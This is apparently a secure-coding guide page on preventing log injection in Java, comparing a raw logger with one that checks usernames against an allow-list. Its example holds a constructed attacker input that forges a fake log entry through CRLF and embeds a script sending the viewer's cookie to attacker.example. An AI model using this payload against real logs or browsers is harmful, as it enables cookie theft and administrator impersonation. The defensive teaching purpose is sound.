Versions Compared

Comment: wordsmithing

...

Logging unsanitized user input can also result in leaking sensitive data across a trust boundary. For example, an attacker might inject a script into a log file such that, when the file is viewed using a web browser, the browser could provide the attacker with a copy of the administrator's cookie, so that the attacker might gain access as the administrator. See IDS00-J. Prevent SQL Injection for more details on input sanitization.

Noncompliant Code Example

...

Compliant Solution

This compliant solution validates the username input before logging it, rejecting any value that does not match an allow-list of permitted characters, which prevents log injection attacks.

...
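The following is an added example, not the code from this rule, that shows both halves of the discussion above in one place: a logger that writes the raw username (the noncompliant pattern) beside one that validates the username against an allow-list before logging (the compliant pattern). The allow-list pattern `[A-Za-z0-9_]+`, the `LogSanitizer` class, and the host `attacker.example` are assumptions made for the example. The constructed attacker input uses a CRLF sequence to forge a second, fake log entry and embeds a script that would run if an operator opened the log file in a browser.

```java
import java.util.logging.Logger;
import java.util.regex.Pattern;

public final class LogSanitizer {
    private static final Logger LOG = Logger.getLogger(LogSanitizer.class.getName());

    // Assumed allow-list for this example: usernames are letters, digits and underscore only.
    // Anything else (CR, LF, '<', quotes, ...) is rejected before it reaches the log.
    private static final Pattern VALID_USERNAME = Pattern.compile("[A-Za-z0-9_]+");

    // Noncompliant: the raw value goes straight into the log record.
    static void logLoginNoncompliant(String username) {
        LOG.info("User login succeeded for: " + username);
    }

    // Compliant: validate against the allow-list first; log only a fixed message on rejection
    // so the attacker-controlled bytes never appear in the log file.
    static boolean logLoginCompliant(String username) {
        if (username == null || !VALID_USERNAME.matcher(username).matches()) {
            LOG.info("User login failed: invalid username rejected");
            return false;
        }
        LOG.info("User login succeeded for: " + username);
        return true;
    }

    public static void main(String[] args) {
        // Constructed attacker input (not taken from the page): the "\r\n" forges a second
        // log line claiming an administrator login, and the <script> would send the viewer's
        // cookie to attacker.example (an assumed host) if the log were rendered in a browser.
        String attack = "guest\r\nUser login succeeded for: administrator <script>"
                + "document.location='http://attacker.example/?c='+document.cookie</script>";

        logLoginNoncompliant(attack);   // writes the forged entry and the script verbatim
        logLoginCompliant(attack);      // rejected: logs only the fixed failure message
        logLoginCompliant("alice_01");  // accepted: matches the allow-list
    }
}
```

Running the `main` method with the default `ConsoleHandler` shows the difference directly: the noncompliant call emits two apparent log entries, the second of which carries the script, while the compliant call emits a single fixed line. Validation rather than escaping is the right choice here because a log consumer is not a single, known sink; the same file may be read by a terminal, a log viewer, or a browser, and an allow-list is safe for all of them.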